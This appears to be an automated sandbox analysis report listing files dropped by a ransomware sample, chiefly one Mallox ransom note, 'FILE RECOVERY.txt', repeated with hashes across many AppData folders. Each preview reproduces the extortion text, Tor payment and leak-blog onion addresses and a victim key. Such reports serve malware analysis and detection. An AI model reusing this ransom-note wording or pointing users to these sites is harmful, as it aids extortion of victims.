                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
